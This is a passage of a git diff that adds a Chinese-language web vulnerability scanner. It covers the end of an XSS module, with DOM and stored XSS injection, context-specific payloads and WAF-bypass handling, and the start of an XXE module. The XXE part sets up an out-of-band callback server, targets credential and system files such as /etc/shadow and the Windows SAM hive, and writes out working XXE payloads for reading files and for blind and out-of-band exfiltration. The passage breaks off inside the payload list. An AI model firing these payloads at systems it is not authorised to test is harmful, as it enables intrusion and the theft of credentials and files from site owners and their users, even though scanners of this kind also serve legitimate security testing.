+                            for (var i = 0; i < sinks.length; i++) {
+                                var sink = sinks[i];
+                                if (allScriptContents.indexOf(paramName + "." + sink) !== -1 ||
+                                    allScriptContents.indexOf(paramName + "['" + sink + "']") !== -1 ||
+                                    allScriptContents.indexOf(paramName + '["' + sink + '"]') !== -1) {
+                                    results.url_based_sources.push({
+                                        'param': paramName,
+                                        'sink': sink
+                                    });
+                                }
+                            }
+                        }
+                    }
+                } catch (e) {
+                    console.error("URL参数分析出错", e);
+                }
+                
+                // 检查流向
+                for (var i = 0; i < results.sources.length; i++) {
+                    var source = results.sources[i];
+                    for (var j = 0; j < results.sinks.length; j++) {
+                        var sink = results.sinks[j];
+                        // 简单检查源到接收器的数据流
+                        if (allScriptContents.indexOf(source + "." + sink) !== -1 ||
+                            allScriptContents.indexOf(source + " " + sink) !== -1 ||
+                            allScriptContents.indexOf(sink + "(" + source) !== -1) {
+                            results.source_to_sink.push({
+                                'source': source,
+                                'sink': sink
+                            });
+                        }
+                    }
+                }
+                
+                // 检查事件处理程序
+                var allElements = document.querySelectorAll('*');
+                var eventAttributes = ['onclick', 'onload', 'onmouseover', 'onerror',
+                                     'onfocus', 'onblur', 'onkeyup', 'onkeydown',
+                                     'onchange', 'onsubmit', 'onreset', 'onselect'];
+                
+                for (var i = 0; i < allElements.length; i++) {
+                    var element = allElements[i];
+                    for (var j = 0; j < eventAttributes.length; j++) {
+                        var attr = eventAttributes[j];
+                        if (element.hasAttribute(attr)) {
+                            var attrValue = element.getAttribute(attr);
+                            // 检查事件处理程序是否使用了危险接收器或者直接来自URL参数
+                            for (var k = 0; k < sinks.length; k++) {
+                                var sink = sinks[k];
+                                if (attrValue.indexOf(sink) !== -1) {
+                                    results.event_handlers.push({
+                                        'element': element.tagName,
+                                        'event': attr,
+                                        'value': attrValue,
+                                        'sink': sink
+                                    });
+                                }
+                            }
+                            
+                            try {
+                                var urlParams = new URLSearchParams(window.location.search);
+                                for (var param of urlParams) {
+                                    var paramName = param[0];
+                                    if (attrValue.indexOf(paramName) !== -1) {
+                                        results.event_handlers.push({
+                                            'element': element.tagName,
+                                            'event': attr,
+                                            'value': attrValue,
+                                            'urlParam': paramName
+                                        });
+                                    }
+                                }
+                            } catch (e) {}
+                        }
+                    }
+                }
+                
+                return results;
+            """, dangerous_sources, dangerous_sinks)
+            
+            # 如果找到了可能的DOM XSS漏洞
+            if (source_sink_check_result['sources'] or 
+                source_sink_check_result['sinks'] or 
+                source_sink_check_result['source_to_sink'] or
+                source_sink_check_result['event_handlers'] or
+                source_sink_check_result['url_based_sources']):
+                
+                logger.info(f"发现可能的DOM XSS：{source_sink_check_result}")
+                
+                # 现在尝试用XSS有效载荷确认漏洞
+                confirmed = False
+                confirmation_payload = None
+                confirmation_param = None
+                
+                # 解析URL查询参数
+                parsed_url = urlparse(url)
+                query_params = dict(parse_qsl(parsed_url.query))
+                base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+                
+                # 对每个URL参数尝试注入XSS有效载荷
+                for param in query_params.keys():
+                    # 尝试多种DOM XSS有效载荷
+                    dom_xss_payloads = [
+                        f"<img src=x onerror=alert('{self.xss_mark}')>",
+                        f"'-alert('{self.xss_mark}')-'",
+                        f"\\'-alert('{self.xss_mark}')-\\'",
+                        f"javascript:alert('{self.xss_mark}')",
+                        f"';alert('{self.xss_mark}');//",
+                        f"\";alert('{self.xss_mark}');//",
+                        f"')alert('{self.xss_mark}');//",
+                        f"\")alert('{self.xss_mark}');//",
+                        f"</script><img src=x onerror=alert('{self.xss_mark}')>",
+                        f"{{}};alert('{self.xss_mark}')"
+                    ]
+                    
+                    for payload in dom_xss_payloads:
+                        try:
+                            # 构建注入参数
+                            test_params = query_params.copy()
+                            test_params[param] = payload
+                            
+                            # 构建测试URL
+                            test_url = f"{base_url}?{urlencode(test_params)}"
+                            
+                            # 访问测试URL
+                            self.driver.get(test_url)
+                            time.sleep(1)  # 给页面一些加载和执行的时间
+                            
+                            # 检查是否有弹窗
+                            try:
+                                alert = self.driver.switch_to.alert
+                                alert_text = alert.text
+                                alert.dismiss()
+                                
+                                if self.xss_mark in alert_text:
+                                    confirmed = True
+                                    confirmation_payload = payload
+                                    confirmation_param = param
+                                    break
+                            except:
+                                # 如果没有弹窗，也可能XSS是通过DOM修改而不是alert触发的
+                                page_source = self.driver.page_source
+                                if self.xss_mark in page_source:
+                                    confirmed = True
+                                    confirmation_payload = payload
+                                    confirmation_param = param
+                                    break
+                        except Exception as e:
+                            logger.debug(f"DOM XSS确认测试出错: {str(e)}")
+                            
+                    if confirmed:
+                        break
+                
+                # 无论是否确认了DOM XSS，都返回可能的漏洞信息
+                return {
+                    'type': 'XSS',
+                    'subtype': 'DOM XSS',
+                    'url': url,
+                    'parameter': confirmation_param if confirmed else None,
+                    'payload': confirmation_payload if confirmed else None,
+                    'severity': '高' if confirmed else '中',
+                    'description': "确认存在DOM XSS漏洞" if confirmed else "可能存在DOM XSS漏洞",
+                    'details': {
+                        "URL": url,
+                        "危险源": source_sink_check_result['sources'],
+                        "危险接收器": source_sink_check_result['sinks'],
+                        "源到接收器流": source_sink_check_result['source_to_sink'],
+                        "可疑事件处理": source_sink_check_result['event_handlers'],
+                        "URL参数流向": source_sink_check_result['url_based_sources'],
+                        "确认状态": "已确认" if confirmed else "未确认",
+                        "确认参数": confirmation_param if confirmed else None,
+                        "确认有效载荷": confirmation_payload if confirmed else None,
+                        "技术栈": str(self.tech_info)
+                    },
+                    'recommendation': "避免使用eval、document.write等危险函数，不要将不可信数据直接插入到HTML或JavaScript中，使用DOMPurify等库过滤输入，启用CSP策略。"
+                }
+                
+        except TimeoutException:
+            logger.warning(f"页面加载超时: {url}")
+        except WebDriverException as e:
+            logger.error(f"浏览器发生错误: {str(e)}")
+        except Exception as e:
+            logger.error(f"扫描DOM XSS时发生错误: {str(e)}")
+            
+        return None
+    
+    def scan_stored_xss(self, url, form, field, verify_url):
+        """
+        扫描存储型XSS漏洞
+        
+        Args:
+            url: 提交表单的URL
+            form: 表单信息
+            field: 字段信息
+            verify_url: 验证URL
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描存储型XSS: {field.get('name')} @ {url}, 验证URL: {verify_url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 获取针对特定WAF的绕过Payload
+        waf_payloads = self._get_waf_bypass_payloads()
+        
+        # 合并标准Payload和WAF绕过Payload
+        all_payloads = self.payloads + waf_payloads
+        
+        # 构建表单数据
+        for payload in all_payloads:
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 提交表单
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查表单提交后，访问验证URL是否包含Payload
+                verify_response = self.http_client.get(verify_url)
+                if not verify_response:
+                    continue
+                    
+                # 检查响应中是否包含Payload
+                if self._check_xss_in_response(verify_response, payload):
+                    return {
+                        'type': 'XSS',
+                        'subtype': 'Stored XSS',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现存储型XSS漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在存储型XSS漏洞，可以执行任意JavaScript代码",
+                        'recommendation': "对用户输入进行过滤和编码，使用安全的前端框架，启用CSP策略"
+                    }
+            except Exception as e:
+                logger.error(f"扫描存储型XSS时发生错误: {str(e)}")
+                
+        return None
+    
+    def _detect_technology(self, url):
+        """
+        检测网站使用的技术栈
+        
+        Args:
+            url: 目标URL
+        """
+        try:
+            # 发送请求
+            response = self.http_client.get(url)
+            if not response:
+                return
+                
+            # 使用技术检测器检测
+            self.tech_info = self.tech_detector.detect(response)
+            
+            frameworks = ", ".join(self.tech_info.get('frontend', []))
+            backends = ", ".join(self.tech_info.get('backend', []))
+            servers = ", ".join(self.tech_info.get('server', []))
+            wafs = ", ".join(self.tech_info.get('waf', []))
+            
+            if frameworks:
+                logger.info(f"检测到前端框架: {frameworks}")
+            if backends:
+                logger.info(f"检测到后端技术: {backends}")
+            if servers:
+                logger.info(f"检测到服务器: {servers}")
+            if wafs:
+                logger.info(f"检测到WAF: {wafs}")
+                
+                # 获取WAF绕过技术
+                bypass_techniques = self.tech_detector.get_waf_bypass_techniques(self.tech_info.get('waf', []))
+                for waf, techniques in bypass_techniques.items():
+                    logger.info(f"可能的{waf} WAF绕过技术:")
+                    for i, technique in enumerate(techniques, 1):
+                        logger.info(f"  {i}. {technique}")
+        except Exception as e:
+            logger.error(f"检测技术栈时发生错误: {str(e)}")
+    
+    def _get_waf_bypass_payloads(self):
+        """
+        根据检测到的WAF，获取对应的绕过Payload
+        
+        Returns:
+            list: 绕过Payload列表
+        """
+        if not self.tech_info.get('waf'):
+            return []
+            
+        # 使用WAF绕过专用的Payload
+        if self.waf_bypass_payloads:
+            return self.waf_bypass_payloads
+            
+        # 如果没有预加载的WAF绕过Payload，则返回空列表
+        return []
+    
+    def _check_xss_in_response(self, response, payload):
+        """
+        检查响应中是否包含XSS Payload
+        
+        Args:
+            response: 响应对象
+            payload: XSS Payload
+            
+        Returns:
+            bool: 是否包含Payload
+        """
+        # 如果响应为空，则返回False
+        if not response or not response.text:
+            return False
+            
+        # 检查响应中是否包含XSS标记
+        if self.xss_mark in response.text:
+            return True
+            
+        # 解析响应内容
+        try:
+            soup = BeautifulSoup(response.text, 'html.parser')
+            
+            # 检查是否存在alert弹窗（仅在使用浏览器时有效）
+            if self.use_browser and self.driver:
+                try:
+                    self.driver.get("data:text/html;charset=utf-8," + response.text)
+                    time.sleep(1)
+                    
+                    # 检查是否有弹窗
+                    alert = self.driver.switch_to.alert
+                    alert_text = alert.text
+                    alert.dismiss()
+                    
+                    if self.xss_mark in alert_text:
+                        return True
+                except:
+                    pass
+                    
+                # 额外检查DOM变化
+                try:
+                    # 执行JavaScript检查DOM是否有变化
+                    has_xss = self.driver.execute_script(f"""
+                        return (function() {{
+                            var hasXSS = false;
+                            
+                            // 检查是否有新添加的脚本标签
+                            var scripts = document.querySelectorAll('script');
+                            for (var i = 0; i < scripts.length; i++) {{
+                                if (scripts[i].textContent.includes('{self.xss_mark}')) {{
+                                    hasXSS = true;
+                                    break;
+                                }}
+                            }}
+                            
+                            // 检查是否有包含XSS标记的DOM节点
+                            var elements = document.querySelectorAll('*');
+                            for (var i = 0; i < elements.length; i++) {{
+                                // 检查元素内容
+                                if (elements[i].innerText && elements[i].innerText.includes('{self.xss_mark}')) {{
+                                    hasXSS = true;
+                                    break;
+                                }}
+                                
+                                // 检查属性值
+                                var attrs = elements[i].attributes;
+                                for (var j = 0; j < attrs.length; j++) {{
+                                    if (attrs[j].value.includes('{self.xss_mark}')) {{
+                                        hasXSS = true;
+                                        break;
+                                    }}
+                                }}
+                            }}
+                            
+                            // 检查框架XSS（React、Vue等）
+                            if (window.React || window._REACT_DEVTOOLS_GLOBAL_HOOK_ || 
+                                window.__REACT_DEVTOOLS_GLOBAL_HOOK__ || 
+                                document.querySelector('[data-reactroot]')) {{
+                                // React应用
+                                try {{
+                                    var reactElements = document.querySelectorAll('*');
+                                    for (var i = 0; i < reactElements.length; i++) {{
+                                        var reactInstance = reactElements[i].__reactInternalInstance$ || 
+                                                        reactElements[i]._reactInternalInstance ||
+                                                        reactElements[i]._reactInternalFiber;
+                                        if (reactInstance && 
+                                            JSON.stringify(reactInstance).includes('{self.xss_mark}')) {{
+                                            hasXSS = true;
+                                            break;
+                                        }}
+                                    }}
+                                }} catch (e) {{}}
+                            }}
+                            
+                            if (window.Vue || window.__VUE_DEVTOOLS_GLOBAL_HOOK__) {{
+                                // Vue应用
+                                try {{
+                                    var vueElements = document.querySelectorAll('*');
+                                    for (var i = 0; i < vueElements.length; i++) {{
+                                        var vueInstance = vueElements[i].__vue__ || vueElements[i].__vue_app__;
+                                        if (vueInstance && 
+                                            JSON.stringify(vueInstance).includes('{self.xss_mark}')) {{
+                                            hasXSS = true;
+                                            break;
+                                        }}
+                                    }}
+                                }} catch (e) {{}}
+                            }}
+                            
+                            // 检查Angular应用
+                            if (window.ng || document.querySelector('[ng-app]') || 
+                                document.querySelector('[data-ng-app]') ||
+                                document.querySelector('[ng-controller]')) {{
+                                try {{
+                                    var ngElements = document.querySelectorAll('*[ng-bind], *[data-ng-bind], *[ng-model], *[data-ng-model]');
+                                    for (var i = 0; i < ngElements.length; i++) {{
+                                        if (ngElements[i].textContent && 
+                                            ngElements[i].textContent.includes('{self.xss_mark}')) {{
+                                            hasXSS = true;
+                                            break;
+                                        }}
+                                    }}
+                                }} catch (e) {{}}
+                            }}
+                            
+                            return hasXSS;
+                        }})();
+                    """)
+                    
+                    if has_xss:
+                        return True
+                except Exception as e:
+                    logger.debug(f"DOM检查失败: {str(e)}")
+            
+            # 检查特定标签
+            for tag_name in ['script', 'img', 'svg', 'iframe', 'body', 'input', 'textarea', 'video', 'audio', 
+                           'a', 'div', 'button', 'form', 'object', 'embed', 'style', 'link', 'meta', 'noscript']:
+                tags = soup.find_all(tag_name)
+                for tag in tags:
+                    tag_str = str(tag)
+                    if self.xss_mark in tag_str:
+                        return True
+                        
+            # 检查特定属性
+            dangerous_attrs = [
+                'src', 'href', 'action', 'data', 'formaction', 'content', 'poster', 'background',
+                'onerror', 'onload', 'onfocus', 'onblur', 'onclick', 'onmouseover', 'onmouseout',
+                'onkeyup', 'onkeydown', 'onchange', 'onsubmit', 'onreset', 'onselect', 'onabort',
+                'ondblclick', 'onkeypress', 'onmousedown', 'onmouseup', 'onmousemove', 'onunload',
+                'onbeforeunload', 'onhashchange', 'onpageshow', 'onpagehide', 'onplay', 'onpause',
+                'ontoggle', 'onanimationstart', 'onanimationend', 'onanimationiteration', 'ontransitionend',
+                'oncopy', 'oncut', 'onpaste', 'onwheel', 'onmessage', 'onstorage'
+            ]
+            
+            for tag in soup.find_all():
+                for attr in dangerous_attrs:
+                    if tag.has_attr(attr) and self.xss_mark in tag[attr]:
+                        return True
+            
+            # 检查内联样式表
+            for style_tag in soup.find_all('style'):
+                if self.xss_mark in style_tag.string:
+                    return True
+                    
+            # 检查JSON数据
+            script_tags = soup.find_all('script')
+            for script in script_tags:
+                if script.string and ('{' in script.string or '[' in script.string):
+                    if self.xss_mark in script.string:
+                        return True
+                        
+            # 检查URL中的javascript:协议
+            for tag in soup.find_all(href=True):
+                href = tag['href']
+                if href.startswith('javascript:') and self.xss_mark in href:
+                    return True
+                    
+            # 检查HTML注释
+            comments = soup.find_all(string=lambda text: isinstance(text, str) and text.strip().startswith('<!--'))
+            for comment in comments:
+                if self.xss_mark in comment:
+                    return True
+                    
+            # 检查隐藏的DOM元素
+            for tag in soup.find_all(style=True):
+                style = tag['style']
+                if (('display:none' in style or 'visibility:hidden' in style) and 
+                    self.xss_mark in str(tag)):
+                    return True
+                    
+            # 检查编码内容(base64等)
+            encoded_patterns = [
+                r'base64,[a-zA-Z0-9+/=]+', 
+                r'data:[^,]+,[a-zA-Z0-9+/=]+'
+            ]
+            
+            for pattern in encoded_patterns:
+                matches = re.findall(pattern, response.text)
+                for match in matches:
+                    try:
+                        decoded = base64.b64decode(match.split(',')[1]).decode('utf-8')
+                        if self.xss_mark in decoded:
+                            return True
+                    except:
+                        pass
+                        
+        except Exception as e:
+            logger.error(f"检查XSS时发生错误: {str(e)}")
+            
+        return False
+    
+    def _detect_context(self, response, injection_point):
+        """
+        检测XSS注入点的上下文
+        
+        Args:
+            response: 响应对象
+            injection_point: 注入点标记
+            
+        Returns:
+            str: 上下文类型 (html, attribute, js, css, url, json)
+        """
+        if not response or not response.text or injection_point not in response.text:
+            return "unknown"
+            
+        try:
+            html_content = response.text
+            soup = BeautifulSoup(html_content, 'html.parser')
+            
+            # 查找注入点在哪个地方
+            for tag in soup.find_all():
+                # 检查是否在标签内文本中
+                if tag.string and injection_point in tag.string:
+                    if tag.name == 'script':
+                        return "js"
+                    elif tag.name == 'style':
+                        return "css"
+                    else:
+                        return "html"
+                
+                # 检查是否在属性中
+                for attr, value in tag.attrs.items():
+                    if isinstance(value, str) and injection_point in value:
+                        if attr in ['src', 'href', 'action', 'formaction']:
+                            return "url"
+                        elif attr.startswith('on'):
+                            return "js_event"
+                        else:
+                            return "attribute"
+            
+            # 检查是否在script的JSON数据中
+            script_tags = soup.find_all('script')
+            for script in script_tags:
+                if script.string and injection_point in script.string:
+                    if '{' in script.string or '[' in script.string:
+                        try:
+                            # 尝试解析成JSON
+                            text = script.string
+                            json_start = text.find('{')
+                            json_end = text.rfind('}') + 1
+                            if json_start >= 0 and json_end > json_start:
+                                json_text = text[json_start:json_end]
+                                if injection_point in json_text:
+                                    return "json"
+                        except:
+                            pass
+                    return "js"
+            
+            # 如果没有找到，可能是在HTML注释或其他地方
+            if f"<!--{injection_point}-->" in html_content or f"<!--{injection_point}" in html_content or f"{injection_point}-->" in html_content:
+                return "comment"
+                
+            # 检查内联样式
+            for style_tag in soup.find_all('style'):
+                if style_tag.string and injection_point in style_tag.string:
+                    return "css"
+                    
+        except Exception as e:
+            logger.error(f"检测上下文时出错: {str(e)}")
+            
+        return "unknown"
+        
+    def _get_context_specific_payloads(self, context):
+        """
+        获取特定上下文的XSS有效载荷
+        
+        Args:
+            context: 上下文类型
+            
+        Returns:
+            list: 适合该上下文的XSS有效载荷列表
+        """
+        # 基本的XSS标记
+        xss_mark = self.xss_mark
+        
+        html_payloads = [
+            f"<img src=x onerror=alert('{xss_mark}')>",
+            f"<svg onload=alert('{xss_mark}')>",
+            f"<iframe onload=alert('{xss_mark}')></iframe>"
+        ]
+        
+        js_payloads = [
+            f"alert('{xss_mark}')",
+            f"(function(){{alert('{xss_mark}')}})();",
+            f"';alert('{xss_mark}');//",
+            f"\";alert('{xss_mark}');//",
+            f"\\';alert('{xss_mark}');//",
+            f"</script><img src=x onerror=alert('{xss_mark}')>"
+        ]
+        
+        attribute_payloads = [
+            f"\" onmouseover=\"alert('{xss_mark}')\" \"",
+            f"' onmouseover='alert(\"{xss_mark}\")' '",
+            f"onload=alert('{xss_mark}')",
+            f"\" onerror=\"alert('{xss_mark}')\" \"",
+            f"' onerror='alert(\"{xss_mark}\")' '"
+        ]
+        
+        url_payloads = [
+            f"javascript:alert('{xss_mark}')",
+            f"data:text/html,<img src=x onerror=alert('{xss_mark}')>",
+            f"data:text/html;base64,{base64.b64encode(f'<img src=x onerror=alert(\'{xss_mark}\')>'.encode()).decode()}"
+        ]
+        
+        css_payloads = [
+            f"</style><img src=x onerror=alert('{xss_mark}')>",
+            f"</style><script>alert('{xss_mark}')</script>",
+            f"<style>@import url(\"data:,*%7bx:expression(alert('{xss_mark}'))%7d\");</style>"
+        ]
+        
+        json_payloads = [
+            f"\",\"x\":\"<img src=x onerror=alert('{xss_mark}')>\",\"",
+            f"\"-alert('{xss_mark}')-\"",
+            f"\\u003cimg src=x onerror=alert('{xss_mark}')\\u003e"
+        ]
+        
+        js_event_payloads = [
+            f"alert('{xss_mark}')",
+            f"a=alert;a('{xss_mark}')",
+            f"[].map(alert)[0]('{xss_mark}')",
+            f"eval('ale'+'rt')(`{xss_mark}`)"
+        ]
+        
+        comment_payloads = [
+            f"--><img src=x onerror=alert('{xss_mark}')><!--",
+            f"--><script>alert('{xss_mark}')</script><!--"
+        ]
+        
+        # 根据上下文返回对应的有效载荷
+        context_payloads = {
+            "html": html_payloads,
+            "js": js_payloads,
+            "attribute": attribute_payloads,
+            "url": url_payloads,
+            "css": css_payloads,
+            "json": json_payloads,
+            "js_event": js_event_payloads,
+            "comment": comment_payloads,
+            "unknown": html_payloads + js_payloads + attribute_payloads
+        }
+        
+        return context_payloads.get(context, html_payloads)
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length))
+    
+    def _to_js_string(self, s):
+        """
+        将字符串转换为JavaScript字符串
+        
+        Args:
+            s: 字符串
+            
+        Returns:
+            str: JavaScript字符串
+        """
+        js_escape_table = {
+            '\\': '\\\\',
+            '\r': '\\r',
+            '\n': '\\n',
+            '"': '\\"',
+            "'": "\\'"
+        }
+        
+        result = ''
+        for c in s:
+            if c in js_escape_table:
+                result += js_escape_table[c]
+            else:
+                result += c
+                
+        return f"'{result}'"
+    
+    def close(self):
+        """关闭资源"""
+        if self.use_browser and self.driver:
+            try:
+                self.driver.quit()
+            except:
+                pass
+            
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True
+        
+    def get_tech_info(self):
+        """获取技术检测信息"""
+        return self.tech_info 
\ No newline at end of file
diff --git a/xss_scanner/scanners/xxe_scanner.py b/xss_scanner/scanners/xxe_scanner.py
new file mode 100644
index 0000000..8c9f048
--- /dev/null
+++ b/xss_scanner/scanners/xxe_scanner.py
@@ -0,0 +1,825 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XXE（XML外部实体注入）扫描器模块，负责扫描XXE漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import uuid
+import base64
+import urllib.parse
+import socket
+import threading
+import http.server
+import socketserver
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class OOBXXEServer(threading.Thread):
+    """带外(OOB)XXE检测服务器类"""
+    
+    def __init__(self, host='localhost', port=0):
+        """
+        初始化OOB XXE检测服务器
+        
+        Args:
+            host: 服务器主机名
+            port: 服务器端口
+        """
+        super().__init__()
+        self.daemon = True
+        self.host = host
+        self.port = port
+        self.server = None
+        self.detected_xxe = []
+        self.uuid_to_details = {}
+        
+    def run(self):
+        """运行OOB XXE检测服务器"""
+        class XXEHandler(http.server.BaseHTTPRequestHandler):
+            def log_message(self, format, *args):
+                # 禁止日志输出
+                pass
+                
+            def do_GET(self):
+                # 响应状态码
+                self.send_response(200)
+                self.send_header('Content-type', 'application/xml')
+                self.end_headers()
+                
+                # 记录请求到detected_xxe
+                request_id = self.path.strip('/').split('/')[-1]
+                attack_details = self.server.uuid_to_details.get(request_id, {})
+                
+                if request_id and len(request_id) > 8:  # 有效的UUID
+                    self.server.detected_xxe.append({
+                        'id': request_id,
+                        'timestamp': time.time(),
+                        'remote_addr': self.client_address[0],
+                        'path': self.path,
+                        'headers': {k: v for k, v in self.headers.items()},
+                        'attack_details': attack_details
+                    })
+                    logger.info(f"检测到XXE回调: {request_id} 来自 {self.client_address[0]}")
+                
+                # 响应内容
+                self.wfile.write(b"<?xml version='1.0'?><!DOCTYPE data SYSTEM 'http://invalid/invalid.dtd'><data></data>")
+                
+        class XXEServer(socketserver.ThreadingTCPServer):
+            allow_reuse_address = True
+            def __init__(self, server_address, handler_class):
+                super().__init__(server_address, handler_class)
+                self.detected_xxe = []
+                self.uuid_to_details = {}
+                
+        try:
+            self.server = XXEServer((self.host, self.port), XXEHandler)
+            self.server.detected_xxe = self.detected_xxe
+            self.server.uuid_to_details = self.uuid_to_details
+            actual_port = self.server.server_address[1]
+            if self.port == 0:
+                self.port = actual_port
+            logger.info(f"OOB XXE检测服务器启动在 {self.host}:{self.port}")
+            self.server.serve_forever()
+        except Exception as e:
+            logger.error(f"启动OOB XXE检测服务器失败: {str(e)}")
+        
+    def stop(self):
+        """停止OOB XXE检测服务器"""
+        if self.server:
+            self.server.shutdown()
+            
+    def register_attack(self, uuid_str, details):
+        """
+        注册攻击到OOB服务器
+        
+        Args:
+            uuid_str: 攻击的UUID
+            details: 攻击详情
+        """
+        self.uuid_to_details[uuid_str] = details
+        
+    def check_detection(self, uuid_str):
+        """
+        检查是否检测到指定UUID的XXE攻击
+        
+        Args:
+            uuid_str: 要检查的UUID
+            
+        Returns:
+            bool: 是否检测到XXE攻击
+        """
+        for detection in self.detected_xxe:
+            if detection['id'] == uuid_str:
+                return True
+        return False
+
+class XXEScanner:
+    """XXE扫描器类，负责扫描XML外部实体注入漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化XXE扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成唯一标识符，用于检测XXE漏洞
+        self.xxe_id = str(uuid.uuid4()).replace('-', '')[:16]
+        
+        # XXE回调域名（尝试使用本地服务器）
+        try:
+            # 尝试启动本地OOB服务器
+            self.oob_server = OOBXXEServer(host='0.0.0.0', port=0)
+            self.oob_server.start()
+            time.sleep(1)  # 等待服务器启动
+            
+            # 获取本机IP
+            hostname = socket.gethostname()
+            ip = socket.gethostbyname(hostname)
+            
+            self.callback_domain = f"http://{ip}:{self.oob_server.port}/{self.xxe_id}"
+            self.dtd_server = f"http://{ip}:{self.oob_server.port}/{self.xxe_id}.dtd"
+            self.oob_available = True
+            logger.info(f"OOB XXE检测服务器启动成功: {self.callback_domain}")
+        except Exception as e:
+            logger.warning(f"启动OOB XXE检测服务器失败: {str(e)}, 将使用示例域名")
+            # 使用示例域名
+            self.callback_domain = f"http://xxe-check.example.com/{self.xxe_id}"
+            self.dtd_server = f"http://dtd-server.example.com/{self.xxe_id}.dtd"
+            self.oob_available = False
+        
+        # XXE Payload数据文件/目录
+        self.common_data_files = [
+            # Linux系统文件
+            "/etc/passwd",
+            "/etc/hosts",
+            "/etc/shadow",
+            "/etc/group",
+            "/etc/issue",
+            "/etc/motd",
+            "/proc/self/environ",
+            "/proc/version",
+            "/proc/cmdline",
+            
+            # Windows系统文件
+            "C:/Windows/win.ini",
+            "C:/boot.ini",
+            "C:/Windows/System32/drivers/etc/hosts",
+            "C:/Windows/System32/config/SAM",
+            
+            # Web应用配置文件
+            "/var/www/html/config.php",
+            "/var/www/html/wp-config.php",
+            "/var/www/html/configuration.php",
+            "/var/www/config/config.ini",
+            "/usr/local/etc/apache22/httpd.conf",
+            "/usr/local/etc/apache24/httpd.conf",
+            "/etc/nginx/nginx.conf",
+            "/etc/httpd/conf/httpd.conf",
+            
+            # 源代码目录
+            "file:///var/www/html/",
+            "file:///var/www/",
+            "file:///var/",
+            "file:///home/",
+            "file:///usr/local/tomcat/conf/server.xml"
+        ]
+        
+        # XXE检测Payload列表 - 基础
+        self.basic_payloads = [
+            # 基本外部实体声明
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <foo>&xxe;</foo>""",
+            
+            # 参数实体
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
+            %xxe;
+            ]>
+            <foo></foo>""",
+            
+            # 带外数据泄露 (OOB)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY % xxe SYSTEM "{self.dtd_server}" >
+            %xxe;
+            ]>
+            <foo></foo>""",
+            
+            # 带外请求 (OOB)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY % xxe SYSTEM "{self.callback_domain}" >
+            %xxe;
+            ]>
+            <foo></foo>""",
+            
+            # PHP环境探测
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >]>
+            <foo>&xxe;</foo>""",
+            
+            # 基本DTD实体定义
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE data [
+            <!ENTITY file SYSTEM "file:///etc/passwd">
+            ]>
+            <data>&file;</data>"""
+        ]
+        
+        # XXE检测Payload列表 - 高级
+        self.advanced_payloads = [
+            # 带外XXE - 数据泄露 (OOB exfiltration)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE data [
+            <!ENTITY % file SYSTEM "file:///etc/passwd">
+            <!ENTITY % dtd SYSTEM "{self.dtd_server}">
+            %dtd;
+            ]>
+            <data>&send;</data>""",
+            
+            # Blind XXE with error-based exfiltration
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE data [
+            <!ENTITY % file SYSTEM "file:///etc/passwd">
+            <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+            %eval;
+            %error;
+            ]>
+            <data>Test</data>""",
+            
+            # XXE via SOAP
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
+            <!DOCTYPE foo [
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <soap:Body><foo>&xxe;</foo></soap:Body>
+            </soap:Envelope>""",
+            
+            # XXE via SVG
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE svg [ 
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <svg width="100" height="100">
+                <text x="10" y="20">&xxe;</text>
